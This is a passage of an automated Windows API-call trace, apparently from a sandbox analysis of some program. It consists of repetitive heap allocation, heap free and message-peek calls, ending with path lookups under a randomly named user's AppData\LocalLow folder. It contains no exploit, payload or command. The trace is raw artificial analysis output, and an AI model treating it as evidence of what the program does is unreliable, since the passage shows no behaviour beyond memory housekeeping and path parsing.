hHeap=0x2c0000) returned 1 [0204.896] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0204.896] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3890 | out: hHeap=0x2c0000) returned 1 [0204.896] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fec48 | out: hHeap=0x2c0000) returned 1 [0204.896] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3940 | out: hHeap=0x2c0000) returned 1 [0204.896] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3998 | out: hHeap=0x2c0000) returned 1 [0204.896] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3368 | out: hHeap=0x2c0000) returned 1 [0204.896] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32febe0 | out: hHeap=0x2c0000) returned 1 [0204.896] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fee50 | out: hHeap=0x2c0000) returned 1 [0204.896] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32feeb8 | out: hHeap=0x2c0000) returned 1 [0204.896] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c34c8 | out: hHeap=0x2c0000) returned 1 [0204.896] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fef20 | out: hHeap=0x2c0000) returned 1 [0204.896] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c37e0 | out: hHeap=0x2c0000) returned 1 [0204.896] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fef88 | out: hHeap=0x2c0000) returned 1 [0204.896] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3788 | out: hHeap=0x2c0000) returned 1 [0204.896] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3730 | out: hHeap=0x2c0000) returned 1 [0204.896] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32feff0 | out: hHeap=0x2c0000) returned 1 [0204.897] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c36d8 | out: hHeap=0x2c0000) returned 1 [0204.897] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff058 | out: hHeap=0x2c0000) returned 1 [0204.897] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3680 | out: hHeap=0x2c0000) returned 1 [0204.897] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c32b8 | out: hHeap=0x2c0000) returned 1 [0204.897] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fecb0 | out: hHeap=0x2c0000) returned 1 [0204.897] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3846b8 | out: hHeap=0x2c0000) returned 1 [0204.897] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c38e8 | out: hHeap=0x2c0000) returned 1 [0204.897] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336f970 | out: hHeap=0x2c0000) returned 1 [0204.897] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3846b8 [0204.897] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0204.897] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.897] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0204.897] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0204.897] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0204.897] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.897] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0204.897] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0204.897] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0204.897] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.897] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0204.897] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0204.897] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0204.897] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.897] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0204.897] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0204.897] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0204.897] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.897] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0204.897] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0204.897] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0204.898] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.898] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0204.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0204.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0204.898] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.898] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0204.898] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0204.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0204.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0204.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0204.898] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.898] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0204.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0204.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0204.898] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.898] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0204.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0204.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0204.898] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.898] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0204.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0204.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0204.898] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.898] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0204.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0204.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0204.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3846b8 | out: hHeap=0x2c0000) returned 1 [0204.898] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0204.898] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3846b8 [0204.898] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0204.899] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.899] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0204.899] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0204.899] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0204.899] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.899] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0204.899] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0204.899] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0204.899] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.899] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0204.899] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0204.899] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0204.899] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.899] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0204.899] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0204.899] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0204.899] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.899] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0204.899] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0204.899] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0204.899] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.899] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0204.899] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0204.899] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0204.899] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.899] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0204.899] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0204.899] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0204.899] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0204.899] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0204.900] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.900] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0204.900] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0204.900] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0204.900] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.900] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0204.900] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0204.900] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0204.900] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.900] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0204.900] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0204.900] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0204.900] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.900] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0204.900] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0204.900] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0204.900] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.900] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0204.900] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0204.900] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0204.900] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.900] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0204.900] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0204.900] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0204.900] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.900] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0204.900] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0204.900] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0204.900] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.900] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0204.901] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0204.901] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0204.901] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.901] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0204.901] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0204.901] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0204.901] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.901] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0204.901] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0204.901] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0204.901] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.901] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0204.901] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0204.901] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0204.901] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.901] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0204.901] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0204.901] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0204.901] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.901] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0204.901] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0204.901] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0204.901] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.901] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b25070 [0204.901] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0204.901] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0204.901] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.901] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0204.902] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0204.902] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0204.902] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.902] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0204.902] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0204.902] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0204.902] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0204.902] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0204.902] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.902] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0204.902] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0204.902] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0204.902] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.902] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0204.902] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0204.902] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0204.902] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0204.902] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0204.902] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.902] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0204.902] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0204.902] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0204.902] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.902] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0204.902] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0204.902] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0204.902] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.902] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0204.902] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0204.902] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0204.903] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.903] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0204.903] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0204.903] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0204.903] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.903] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0204.903] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0204.903] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0204.903] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0204.903] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0204.903] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.903] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0204.903] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0204.903] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0204.903] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.903] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0204.903] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0204.903] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0204.903] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.903] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0204.903] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0204.903] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0204.903] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.903] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0204.903] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0204.903] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0204.903] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.903] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0204.903] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0204.903] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0204.904] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.904] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0204.904] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0204.904] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0204.904] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.904] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0204.904] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0204.904] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0204.904] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0204.904] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c38e8 [0204.904] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0204.904] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b80f18 [0204.904] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0204.904] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0100 [0204.904] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0204.904] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0204.904] PathFindFileNameW (pszPath="") returned="" [0204.904] RtlAllocateHeap 